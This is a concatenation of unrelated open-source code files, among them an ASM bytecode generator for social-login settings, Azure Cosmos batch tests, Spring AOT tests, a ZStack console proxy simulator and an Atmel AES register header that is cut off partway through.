ConfigExt qq = socialExt.qq; if (qq.enable) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(Opcodes.ICONST_1); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "qqEnable", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(qq.appId); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "qqAppId", "Ljava/lang/String;"); } ConfigExt wb = socialExt.wb; if (wb.enable) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(Opcodes.ICONST_1); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wbEnable", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(wb.appId); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wbAppId", "Ljava/lang/String;"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(wb.url); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wbRedirectUrl", "Ljava/lang/String;"); } ConfigExt dd = socialExt.dd; if (dd.enable) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(Opcodes.ICONST_1); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "ddEnable", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(dd.appId); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "ddAppId", "Ljava/lang/String;"); } mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(TransformX.toAsmBool(socialExt.shareSuccessIfStay)); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "shareSuccessIfStay", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitIntInsn(Opcodes.BIPUSH, socialExt.tokenExpiresHours); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "tokenExpiresHours", "I"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(TransformX.toAsmBool(socialExt.useGson)); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "useGson", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(TransformX.toAsmBool(socialExt.useOkHttp)); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "useOkHttp", "Z"); if (socialExt.appName != null) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(socialExt.appName); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "appName", "Ljava/lang/String;"); } if (socialExt.color != null) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(socialExt.color); mv.visitMethodInsn(Opcodes.INVOKESTATIC, "android/graphics/Color", "parseColor", "(Ljava/lang/String;)I", false); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wbProgressColor", "I"); } for (String name : Settings.platformClassList) { String pkgClassPath = TransformX.toPkgClassPath(name); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitFieldInsn(Opcodes.GETFIELD, "com/zfy/social/core/SocialOptions$Builder", "factoryClassList", "Ljava/util/Set;"); mv.visitLdcInsn(pkgClassPath); mv.visitMethodInsn(Opcodes.INVOKEINTERFACE, "java/util/Set", "add", "(Ljava/lang/Object;)Z", true); mv.visitInsn(Opcodes.POP); } super.visitCode(); UtilX.log("结束 visit code"); } } }
3,495
1,350
<filename>sdk/cosmos/azure-cosmos/src/test/java/com/azure/cosmos/implementation/batch/PartitionKeyRangeServerBatchRequestTests.java<gh_stars>1000+ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License. package com.azure.cosmos.implementation.batch; import com.azure.cosmos.implementation.JsonSerializable; import com.azure.cosmos.implementation.apachecommons.lang.StringUtils; import com.azure.cosmos.models.CosmosItemOperation; import com.azure.cosmos.models.CosmosItemOperationType; import com.azure.cosmos.models.PartitionKey; import org.testng.annotations.Test; import java.util.ArrayList; import java.util.List; import static org.assertj.core.api.Assertions.assertThat; public class PartitionKeyRangeServerBatchRequestTests { private static final int TIMEOUT = 40000; private CosmosItemOperation createItemBulkOperation(String id) { ItemBulkOperation<?, ?> operation = new ItemBulkOperation<>( CosmosItemOperationType.CREATE, id, PartitionKey.NONE, null, null, null ); return operation; } @Test(groups = {"unit"}, timeOut = TIMEOUT) public void fitsAllOperations() { List<CosmosItemOperation> operations = new ArrayList<CosmosItemOperation>() {{ createItemBulkOperation(""); createItemBulkOperation(""); }}; ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequest.createBatchRequest( "0", operations, 200000, 2); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(operations.size()); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations()).isEqualTo(operations); assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()).isZero(); } @Test(groups = {"unit"}, timeOut = TIMEOUT) public void overflowsBasedOnCount() { List<CosmosItemOperation> operations = new ArrayList<CosmosItemOperation>() {{ add(createItemBulkOperation("1")); add(createItemBulkOperation("2")); add(createItemBulkOperation("3")); }}; // Setting max count to 0, at least one element will always get added ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequest.createBatchRequest( "0", operations, 200000, 0); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(1); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().get(0).getId()).isEqualTo(operations.get(0).getId()); assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()).isEqualTo(2); assertThat(serverOperationBatchRequest.getBatchPendingOperations().get(0).getId()).isEqualTo(operations.get(1).getId()); assertThat(serverOperationBatchRequest.getBatchPendingOperations().get(1).getId()).isEqualTo(operations.get(2).getId()); } @Test(groups = {"unit"}, timeOut = TIMEOUT) public void overflowsBasedOnCountWithOffset() { List<CosmosItemOperation> operations = new ArrayList<CosmosItemOperation>() {{ add(createItemBulkOperation("1")); add(createItemBulkOperation("2")); add(createItemBulkOperation("3")); }}; // Setting max count to 1 ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequest.createBatchRequest( "0", operations.subList(1, 3), 200000, 1); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(1); // The first element is not taken into account due to an Offset of 1 assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().get(0).getId()).isEqualTo(operations.get(1).getId()); assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()).isEqualTo(1); assertThat(serverOperationBatchRequest.getBatchPendingOperations().get(0).getId()).isEqualTo(operations.get(2).getId()); } @Test(groups = {"unit"}, timeOut = TIMEOUT * 100) public void partitionKeyRangeServerBatchRequestSizeTests() { int docSizeInBytes = 250; int operationCount = 10; for (int expectedOperationCount : new int[] { 1, 2, 5, 10 }) { PartitionKeyRangeServerBatchRequestTests. verifyServerRequestCreationsBySizeAsync(expectedOperationCount, operationCount, docSizeInBytes); PartitionKeyRangeServerBatchRequestTests. verifyServerRequestCreationsByCountAsync(expectedOperationCount, operationCount, docSizeInBytes); } } private static void verifyServerRequestCreationsBySizeAsync( int expectedOperationCount, int operationCount, int docSizeInBytes) { int perDocOverheadEstimateInBytes = 50; int maxServerRequestBodyLength = (docSizeInBytes + perDocOverheadEstimateInBytes) * expectedOperationCount; int maxServerRequestOperationCount = Integer.MAX_VALUE; ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequestTests. getBatchWithCreateOperationsAsync(operationCount, maxServerRequestBodyLength, maxServerRequestOperationCount, docSizeInBytes); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(expectedOperationCount); assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()). isEqualTo(operationCount - serverOperationBatchRequest.getBatchRequest().getOperations().size()); } private static void verifyServerRequestCreationsByCountAsync( int expectedOperationCount, int operationCount, int docSizeInBytes) { int maxServerRequestBodyLength = Integer.MAX_VALUE; ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequestTests. getBatchWithCreateOperationsAsync(operationCount, maxServerRequestBodyLength, expectedOperationCount, docSizeInBytes); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(expectedOperationCount); assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()). isEqualTo(operationCount - serverOperationBatchRequest.getBatchRequest().getOperations().size()); } private static ServerOperationBatchRequest getBatchWithCreateOperationsAsync( int operationCount, int maxServerRequestBodyLength, int maxServerRequestOperationCount, int docSizeInBytes) { List<CosmosItemOperation> operations = new ArrayList<>(); for (int i = 0; i < operationCount; i++) { JsonSerializable jsonSerializable = new JsonSerializable(); jsonSerializable.set("abc", StringUtils.repeat("x", docSizeInBytes - 10));// {"abc":" + "} = 10 ItemBulkOperation<?, ?> operation = new ItemBulkOperation<>( CosmosItemOperationType.CREATE, "", null, null, jsonSerializable, null ); operations.add(operation); } return PartitionKeyRangeServerBatchRequest.createBatchRequest( "0", operations, maxServerRequestBodyLength, maxServerRequestOperationCount); } }
2,925
2,199
/******************************************************************************* * This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. ******************************************************************************/ package the8472.utils; import java.util.Iterator; import java.util.Map; import java.util.Objects; import javax.xml.XMLConstants; import javax.xml.namespace.NamespaceContext; import javax.xml.xpath.XPath; import javax.xml.xpath.XPathExpression; import javax.xml.xpath.XPathExpressionException; import javax.xml.xpath.XPathFactory; public class XMLUtils { public static XPathExpression buildXPath(String path) { return buildXPath(path, null); } public static XPathExpression buildXPath(String path, Map<String, String> map) { XPathFactory xPathfactory = XPathFactory.newInstance(); XPath xpath = xPathfactory.newXPath(); if(map != null) xpath.setNamespaceContext(new NamespaceContext() { public Iterator getPrefixes(String namespaceURI) { throw new UnsupportedOperationException(); } public String getPrefix(String namespaceURI) { throw new UnsupportedOperationException(); } public String getNamespaceURI(String prefix) { Objects.requireNonNull(prefix); if(map.containsKey(prefix)) return map.get(prefix); return XMLConstants.NULL_NS_URI; } }); try { return xpath.compile(path); } catch (XPathExpressionException e) { throw new RuntimeException(e); } } }
537
1,702
/* * Copyright 2019-2021 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.aot.context.bootstrap.generator.infrastructure; import java.util.Arrays; import java.util.Collections; import org.junit.jupiter.api.Test; import org.springframework.aot.context.bootstrap.generator.infrastructure.ProtectedAccessAnalysis.ProtectedElement; import org.springframework.aot.context.bootstrap.generator.sample.visibility.ProtectedConstructorComponent; import org.springframework.aot.context.bootstrap.generator.sample.visibility.ProtectedFactoryMethod; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.assertThatIllegalStateException; /** * Tests for {@link ProtectedAccessAnalysis}. * * @author <NAME> */ class ProtectedAccessAnalysisTests { @Test void isAccessibleWithPublicElements() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Collections.emptyList()); assertThat(analysis.isAccessible()).isTrue(); } @Test void isAccessibleWithProtectedElement() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Collections.singletonList( ProtectedElement.of(ProtectedConstructorComponent.class, null))); assertThat(analysis.isAccessible()).isFalse(); } @Test void getPrivilegedPackageNameWithPublicElements() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Collections.emptyList()); assertThat(analysis.getPrivilegedPackageName()).isNull(); } @Test void getPrivilegedPackageNameWithProtectedElement() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Collections.singletonList( ProtectedElement.of(ProtectedConstructorComponent.class, null))); assertThat(analysis.getPrivilegedPackageName()).isEqualTo(ProtectedConstructorComponent.class.getPackageName()); } @Test void getPrivilegedPackageNameWithProtectedElementsFromSamePackage() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Arrays.asList( ProtectedElement.of(ProtectedConstructorComponent.class, null), ProtectedElement.of(ProtectedFactoryMethod.class, null))); assertThat(analysis.getPrivilegedPackageName()).isEqualTo(ProtectedConstructorComponent.class.getPackageName()); } @Test void getPrivilegedPackageNameWithProtectedElementsFromDifferentPackages() { ProtectedAccessAnalysis analysis = new ProtectedAccessAnalysis(Arrays.asList( ProtectedElement.of(ProtectedConstructorComponent.class, null), ProtectedElement.of(String.class, null))); assertThatIllegalStateException().isThrownBy(analysis::getPrivilegedPackageName) .withMessageContaining(ProtectedConstructorComponent.class.getPackageName()) .withMessageContaining(String.class.getPackageName()); } }
948
541
/** * The contents of this file are subject to the license and copyright * detailed in the LICENSE and NOTICE files at the root of the source * tree and available online at * * http://www.dspace.org/license/ */ package org.dspace.xmlworkflow.state.actions; import org.dspace.xmlworkflow.state.actions.userassignment.UserSelectionAction; /** * A class containing the user selection action configuration * * @author <NAME> (bram.deschouwer at dot com) * @author <NAME> (kevin at atmire dot com) * @author <NAME> (ben at atmire dot com) * @author <NAME> (markd at atmire dot com) */ public class UserSelectionActionConfig extends WorkflowActionConfig { public UserSelectionActionConfig(String id) { super(id); } public void setProcessingAction(UserSelectionAction processingAction) { this.processingAction = processingAction; processingAction.setParent(this); } @Override public UserSelectionAction getProcessingAction() { return (UserSelectionAction) processingAction; } }
328
2,890
<filename>lts-core/src/main/java/com/github/ltsopensource/core/support/CrossClassLoader.java package com.github.ltsopensource.core.support; import com.github.ltsopensource.core.logger.Logger; import com.github.ltsopensource.core.logger.LoggerFactory; import java.lang.reflect.Field; import java.util.Vector; /** * 用来处理跨classLoader 共享class * @author <NAME> (<EMAIL>) on 6/25/16. */ public class CrossClassLoader { private static final Logger LOGGER = LoggerFactory.getLogger(CrossClassLoader.class); private static Field classes; private static final Object LOCK = new Object(); static { try { classes = ClassLoader.class.getDeclaredField("classes"); classes.setAccessible(true); } catch (Throwable e) { LOGGER.error("get ClassLoader 'classes' Field Error", e); } } @SuppressWarnings("unchecked") public static Class loadClass(String classname) throws ClassNotFoundException { if (classes == null) { return Thread.currentThread().getContextClassLoader().loadClass(classname); } try { synchronized (LOCK) { Vector v = (Vector) classes.get(CrossClassLoader.class.getClassLoader().getParent()); for (int i = 0; i < v.size(); i++) { Class o = (Class) v.get(i); if (classname.equals(o.getName())) { return o; } } Class clazz = CrossClassLoader.class.getClassLoader().loadClass(classname); v.add(clazz); return clazz; } } catch (Exception e) { throw new ClassNotFoundException("load " + classname + " Error ", e); } } }
798
5,422
<filename>src/share/types/operation_type.hpp #pragma once #include <nlohmann/json.hpp> namespace krbn { enum class operation_type : uint8_t { none, // observer -> grabber momentary_switch_event_arrived, observed_devices_updated, caps_lock_state_changed, // session_monitor -> grabber console_user_id_changed, // console_user_server -> grabber connect_console_user_server, system_preferences_updated, frontmost_application_changed, input_source_changed, // any -> grabber set_variables, // grabber -> console_user_server shell_command_execution, select_input_source, software_function, end_, }; NLOHMANN_JSON_SERIALIZE_ENUM( operation_type, { {operation_type::none, nullptr}, {operation_type::momentary_switch_event_arrived, "momentary_switch_event_arrived"}, {operation_type::observed_devices_updated, "observed_devices_updated"}, {operation_type::caps_lock_state_changed, "caps_lock_state_changed"}, {operation_type::console_user_id_changed, "console_user_id_changed"}, {operation_type::connect_console_user_server, "connect_console_user_server"}, {operation_type::system_preferences_updated, "system_preferences_updated"}, {operation_type::frontmost_application_changed, "frontmost_application_changed"}, {operation_type::input_source_changed, "input_source_changed"}, {operation_type::set_variables, "set_variables"}, {operation_type::shell_command_execution, "shell_command_execution"}, {operation_type::select_input_source, "select_input_source"}, {operation_type::software_function, "software_function"}, {operation_type::end_, "end_"}, }); } // namespace krbn
634
1,355
// Copyright (c) 2018 <NAME> // // I am making my contributions/submissions to this project solely in my // personal capacity and am not conveying any rights to any intellectual // property of any third parties. #include <pch.h> #include <jet/grid_boundary_condition_solver2.h> using namespace jet; GridBoundaryConditionSolver2::GridBoundaryConditionSolver2() { } GridBoundaryConditionSolver2::~GridBoundaryConditionSolver2() { } const Collider2Ptr& GridBoundaryConditionSolver2::collider() const { return _collider; } void GridBoundaryConditionSolver2::updateCollider( const Collider2Ptr& newCollider, const Size2& gridSize, const Vector2D& gridSpacing, const Vector2D& gridOrigin) { _collider = newCollider; _gridSize = gridSize; _gridSpacing = gridSpacing; _gridOrigin = gridOrigin; onColliderUpdated(gridSize, gridSpacing, gridOrigin); } int GridBoundaryConditionSolver2::closedDomainBoundaryFlag() const { return _closedDomainBoundaryFlag; } void GridBoundaryConditionSolver2::setClosedDomainBoundaryFlag(int flag) { _closedDomainBoundaryFlag = flag; } const Size2& GridBoundaryConditionSolver2::gridSize() const { return _gridSize; } const Vector2D& GridBoundaryConditionSolver2::gridSpacing() const { return _gridSpacing; } const Vector2D& GridBoundaryConditionSolver2::gridOrigin() const { return _gridOrigin; }
457
879
package org.zstack.simulator.consoleproxy; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.http.HttpEntity; import org.springframework.stereotype.Controller; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.bind.annotation.ResponseBody; import org.zstack.core.thread.AsyncThread; import org.zstack.header.console.ConsoleConstants; import org.zstack.header.console.ConsoleProxyCommands; import org.zstack.header.console.ConsoleProxyCommands.DeleteProxyCmd; import org.zstack.header.console.ConsoleProxyCommands.DeleteProxyRsp; import org.zstack.header.exception.CloudRuntimeException; import org.zstack.header.rest.RESTFacade; import org.zstack.simulator.AsyncRESTReplyer; import org.zstack.utils.Utils; import org.zstack.utils.gson.JSONObjectUtil; import org.zstack.utils.logging.CLogger; import javax.servlet.http.HttpServletRequest; public class ConsoleProxySimulator { CLogger logger = Utils.getLogger(ConsoleProxySimulator.class); @Autowired private ConsoleProxySimulatorConfig config; @Autowired private RESTFacade restf; private AsyncRESTReplyer replyer = new AsyncRESTReplyer(); @RequestMapping(value= ConsoleConstants.CONSOLE_PROXY_PING_PATH, method= RequestMethod.POST) public @ResponseBody String ping(HttpEntity<String> entity) { ConsoleProxyCommands.PingCmd cmd = JSONObjectUtil.toObject(entity.getBody(), ConsoleProxyCommands.PingCmd.class); ConsoleProxyCommands.PingRsp rsp = new ConsoleProxyCommands.PingRsp(); if (!config.pingSuccess) { throw new CloudRuntimeException("on purpose"); } else { config.pingCmdList.add(cmd); } return JSONObjectUtil.toJsonString(rsp); } @AsyncThread private void doCheck(HttpEntity<String> entity) { ConsoleProxyCommands.CheckAvailabilityCmd cmd = JSONObjectUtil.toObject(entity.getBody(), ConsoleProxyCommands.CheckAvailabilityCmd.class); ConsoleProxyCommands.CheckAvailabilityRsp rsp = new ConsoleProxyCommands.CheckAvailabilityRsp(); if (!config.availableSuccess) { rsp.setSuccess(false); rsp.setError("Fail check on purpose"); } else { rsp.setAvailable(config.isAvailable); } replyer.reply(entity, rsp); } @RequestMapping(value= ConsoleConstants.CONSOLE_PROXY_CHECK_PROXY_PATH, method=RequestMethod.POST) public @ResponseBody String check(HttpServletRequest req) { HttpEntity<String> entity = restf.httpServletRequestToHttpEntity(req); doCheck(entity); return null; } @RequestMapping(value= ConsoleConstants.CONSOLE_PROXY_ESTABLISH_PROXY_PATH, method=RequestMethod.POST) public @ResponseBody String estabilish(HttpServletRequest req) { HttpEntity<String> entity = restf.httpServletRequestToHttpEntity(req); doEstabilish(entity); return null; } private void doEstabilish(HttpEntity<String> entity) { ConsoleProxyCommands.EstablishProxyCmd cmd = JSONObjectUtil.toObject(entity.getBody(), ConsoleProxyCommands.EstablishProxyCmd.class); ConsoleProxyCommands.EstablishProxyRsp rsp = new ConsoleProxyCommands.EstablishProxyRsp(); if (!config.proxySuccess) { rsp.setSuccess(false); rsp.setError("fail establishing proxy on purpose"); } else { rsp.setProxyPort(config.proxyPort); logger.debug(String.format("successfully establish console proxy %s at port %s", JSONObjectUtil.toJsonString(cmd), config.proxyPort)); } replyer.reply(entity, rsp); } @RequestMapping(value= ConsoleConstants.CONSOLE_PROXY_DELETE_PROXY_PATH, method=RequestMethod.POST) public @ResponseBody String delete(HttpServletRequest req) { HttpEntity<String> entity = restf.httpServletRequestToHttpEntity(req); delete(entity); return null; } private void delete(HttpEntity<String> entity) { DeleteProxyCmd cmd = JSONObjectUtil.toObject(entity.getBody(), DeleteProxyCmd.class); config.deleteProxyCmdList.add(cmd); DeleteProxyRsp rsp = new DeleteProxyRsp(); replyer.reply(entity, rsp); } }
1,594
633
<reponame>kuroyukihime0/ActSwitchAnimTool package yellow5a5.sample.ShareDemo; /** * Created by Yellow5A5 on 16/9/17. */ public interface IShare { void faceBookShareClick(); void twitterShareClick(); void googlePlusShareClick(); }
88
678
<reponame>bzxy/cydia<gh_stars>100-1000 /** * This header is generated by class-dump-z 0.2b. * * Source: /System/Library/PrivateFrameworks/GMM.framework/GMM */ #import <GMM/XXUnknownSuperclass.h> __attribute__((visibility("hidden"))) @interface GMMSetHttpCookieResponse : XXUnknownSuperclass { } - (void)writeTo:(id)to; // 0x1bcdd - (BOOL)readFrom:(id)from; // 0x1bc2d - (id)dictionaryRepresentation; // 0x1bc11 - (id)description; // 0x1bba1 - (void)dealloc; // 0x1bb75 @end
198
666
import sys sys.path.append("../../") from appJar import gui app=gui() app.addCheckBox("b1") app.addRadioButton("b1", "b1") app.addButton("BUTTON", None) app.setFg("pink") app.setBg("blue") app.go()
85
2,603
/* ---------------------------------------------------------------------------- */ /* Atmel Microcontroller Software Support */ /* SAM Software Package License */ /* ---------------------------------------------------------------------------- */ /* Copyright (c) 2014, Atmel Corporation */ /* */ /* All rights reserved. */ /* */ /* Redistribution and use in source and binary forms, with or without */ /* modification, are permitted provided that the following condition is met: */ /* */ /* - Redistributions of source code must retain the above copyright notice, */ /* this list of conditions and the disclaimer below. */ /* */ /* Atmel's name may not be used to endorse or promote products derived from */ /* this software without specific prior written permission. */ /* */ /* DISCLAIMER: THIS SOFTWARE IS PROVIDED BY ATMEL "AS IS" AND ANY EXPRESS OR */ /* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF */ /* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT ARE */ /* DISCLAIMED. IN NO EVENT SHALL ATMEL BE LIABLE FOR ANY DIRECT, INDIRECT, */ /* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT */ /* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, */ /* OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF */ /* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING */ /* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, */ /* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ /* ---------------------------------------------------------------------------- */ #ifndef _SAM_AES_COMPONENT_ #define _SAM_AES_COMPONENT_ /* ============================================================================= */ /** SOFTWARE API DEFINITION FOR Advanced Encryption Standard */ /* ============================================================================= */ /** \addtogroup SAM_AES Advanced Encryption Standard */ /*@{*/ #if !(defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__)) /** \brief Aes hardware registers */ typedef struct { __O uint32_t AES_CR; /**< \brief (Aes Offset: 0x00) Control Register */ __IO uint32_t AES_MR; /**< \brief (Aes Offset: 0x04) Mode Register */ __I uint32_t Reserved1[2]; __O uint32_t AES_IER; /**< \brief (Aes Offset: 0x10) Interrupt Enable Register */ __O uint32_t AES_IDR; /**< \brief (Aes Offset: 0x14) Interrupt Disable Register */ __I uint32_t AES_IMR; /**< \brief (Aes Offset: 0x18) Interrupt Mask Register */ __I uint32_t AES_ISR; /**< \brief (Aes Offset: 0x1C) Interrupt Status Register */ __O uint32_t AES_KEYWR[8]; /**< \brief (Aes Offset: 0x20) Key Word Register */ __O uint32_t AES_IDATAR[4]; /**< \brief (Aes Offset: 0x40) Input Data Register */ __I uint32_t AES_ODATAR[4]; /**< \brief (Aes Offset: 0x50) Output Data Register */ __O uint32_t AES_IVR[4]; /**< \brief (Aes Offset: 0x60) Initialization Vector Register */ __IO uint32_t AES_AADLENR; /**< \brief (Aes Offset: 0x70) Additional Authenticated Data Length Register */ __IO uint32_t AES_CLENR; /**< \brief (Aes Offset: 0x74) Plaintext/Ciphertext Length Register */ __IO uint32_t AES_GHASHR[4]; /**< \brief (Aes Offset: 0x78) GCM Intermediate Hash Word Register */ __I uint32_t AES_TAGR[4]; /**< \brief (Aes Offset: 0x88) GCM Authentication Tag Word Register */ __I uint32_t AES_CTRR; /**< \brief (Aes Offset: 0x98) GCM Encryption Counter Value Register */ __IO uint32_t AES_GCMHR[4]; /**< \brief (Aes Offset: 0x9C) GCM H World Register */ __I uint32_t Reserved2[20]; __I uint32_t AES_VERSION; /**< \brief (Aes Offset: 0xFC) Version Register */ } Aes; #endif /* !(defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__)) */ /* -------- AES_CR : (AES Offset: 0x00) Control Register -------- */ #define AES_CR_START (0x1u << 0) /**< \brief (AES_CR) Start Processing */ #define AES_CR_SWRST (0x1u << 8) /**< \brief (AES_CR) Software Reset */ /* -------- AES_MR : (AES Offset: 0x04) Mode Register -------- */ #define AES_MR_CIPHER (0x1u << 0) /**< \brief (AES_MR) Processing Mode */ #define AES_MR_GTAGEN (0x1u << 1) /**< \brief (AES_MR) GCM Automatic Tag Generation Enable */ #define AES_MR_DUALBUFF (0x1u << 3) /**< \brief (AES_MR) Dual Input Buffer */ #define AES_MR_DUALBUFF_INACTIVE (0x0u << 3) /**< \brief (AES_MR) AES_IDATARx cannot be written during processing of previous block. */ #define AES_MR_DUALBUFF_ACTIVE (0x1u << 3) /**< \brief (AES_MR) AES_IDATARx can be written during processing of previous block when SMOD = 0x2. It speeds up the overall runtime of large files. */ #define AES_MR_PROCDLY_Pos 4 #define AES_MR_PROCDLY_Msk (0xfu << AES_MR_PROCDLY_Pos) /**< \brief (AES_MR) Processing Delay */ #define AES_MR_PROCDLY(value) ((AES_MR_PROCDLY_Msk & ((value) << AES_MR_PROCDLY_Pos))) #define AES_MR_SMOD_Pos 8 #define AES_MR_SMOD_Msk (0x3u << AES_MR_SMOD_Pos) /**< \brief (AES_MR) Start Mode */ #define AES_MR_SMOD_MANUAL_START (0x0u << 8) /**< \brief (AES_MR) Manual Mode */ #define AES_MR_SMOD_AUTO_START (0x1u << 8) /**< \brief (AES_MR) Auto Mode */ #define AES_MR_SMOD_IDATAR0_START (0x2u << 8) /**< \brief (AES_MR) AES_IDATAR0 access only Auto Mode */ #define AES_MR_KEYSIZE_Pos 10 #define AES_MR_KEYSIZE_Msk (0x3u << AES_MR_KEYSIZE_Pos) /**< \brief (AES_MR) Key Size */ #define AES_MR_KEYSIZE_AES128 (0x0u << 10) /**< \brief (AES_MR) AES Key Size is 128 bits */ #define AES_MR_KEYSIZE_AES192 (0x1u << 10) /**< \brief (AES_MR) AES Key Size is 192 bits */ #define AES_MR_KEYSIZE_AES256 (0x2u << 10) /**< \brief (AES_MR) AES Key Size is 256 bits */ #define AES_MR_OPMOD_Pos 12 #define AES_MR_OPMOD_Msk (0x7u << AES_MR_OPMOD_Pos) /**< \brief (AES_MR) Operation Mode */ #define AES_MR_OPMOD_ECB (0x0u << 12) /**< \brief (AES_MR) ECB: Electronic Code Book mode */ #define AES_MR_OPMOD_CBC (0x1u << 12) /**< \brief (AES_MR) CBC: Cipher Block Chaining mode */ #define AES_MR_OPMOD_OFB (0x2u << 12) /**< \brief (AES_MR) OFB: Output Feedback mode */ #define AES_MR_OPMOD_CFB (0x3u << 12) /**< \brief (AES_MR) CFB: Cipher Feedback mode */ #define AES_MR_OPMOD_CTR (0x4u << 12) /**< \brief (AES_MR) CTR: Counter mode (16-bit internal counter) */ #define AES_MR_OPMOD_GCM (0x5u << 12) /**< \brief (AES_MR) GCM: Galois Counter mode */ #define AES_MR_LOD (0x1u << 15) /**< \brief (AES_MR) Last Output Data Mode */ #define AES_MR_CFBS_Pos 16 #define AES_MR_CFBS_Msk (0x7u << AES_MR_CFBS_Pos) /**< \brief (AES_MR) Cipher Feedback Data Size */ #define AES_MR_CFBS_SIZE_128BIT (0x0u << 16) /**< \brief (AES_MR) 128-bit */ #define AES_MR_CFBS_SIZE_64BIT (0x1u << 16) /**< \brief (AES_MR) 64-bit */ #define AES_MR_CFBS_SIZE_32BIT (0x2u << 16) /**< \brief (AES_MR) 32-bit */ #define AES_MR_CFBS_SIZE_16BIT (0x3u << 16) /**< \brief (AES_MR) 16-bit */ #define AES_MR_CFBS_SIZE_8BIT (0x4u << 16) /**< \brief (AES_MR) 8-bit */ #define AES_MR_CKEY_Pos 20 #define AES_MR_CKEY_Msk (0xfu << AES_MR_CKEY_Pos) /**< \brief (AES_MR) Key */ #define AES_MR_CKEY_PASSWD (0xEu << 20) /**< \brief (AES_MR) This field must be written with 0xE the first time that AES_MR is programmed. For subsequent programming of the AES_MR, 